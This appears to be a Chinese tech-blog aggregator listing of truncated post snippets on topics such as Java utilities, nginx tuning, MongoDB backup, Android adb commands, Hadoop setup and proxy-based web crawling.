    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他